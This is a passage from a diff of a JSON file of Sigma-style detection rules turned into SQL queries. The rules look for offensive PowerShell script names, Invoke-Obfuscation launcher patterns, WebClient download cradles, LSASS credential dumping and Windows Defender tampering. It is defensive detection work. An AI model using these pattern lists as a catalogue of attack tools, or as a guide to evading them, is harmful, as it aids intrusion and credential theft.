'\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" ], - "filename": "win_vul_cve_2021_41379.yml" + "filename": "posh_pm_exploit_scripts.yml" }, { - "title": "Microsoft Malware Protection Engine Crash", - "id": "6c82cf5c-090d-4d57-9188-533577631108", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", + "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", "status": "experimental", - "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1211", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "MsMpEng.exe can crash when C:\\ is full" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND ((Provider_Name = 'Application Error' AND EventID = '1000') OR (Provider_Name = 'Windows Error Reporting' AND EventID = '1001')) AND (Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" ], - "filename": "win_susp_msmpeng_crash.yml" + "filename": "posh_pm_invoke_obfuscation_via_var.yml" }, { - "title": "MSI Installation From Web", - "id": "5594e67a-7f92-4a04-b65d-1a42fd824a60", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", + "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "status": "experimental", - "description": "Detects installation of a remote msi file from web.", - "author": "Stamatis Chatzimangou", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1218", - "attack.t1218.007" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_susp_zip_compress.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", - "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module", + "id": "a23791fe-8846-485a-b16b-ca691e1b03d4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.t1219" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "status": "test", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", - "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_exclusions.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": 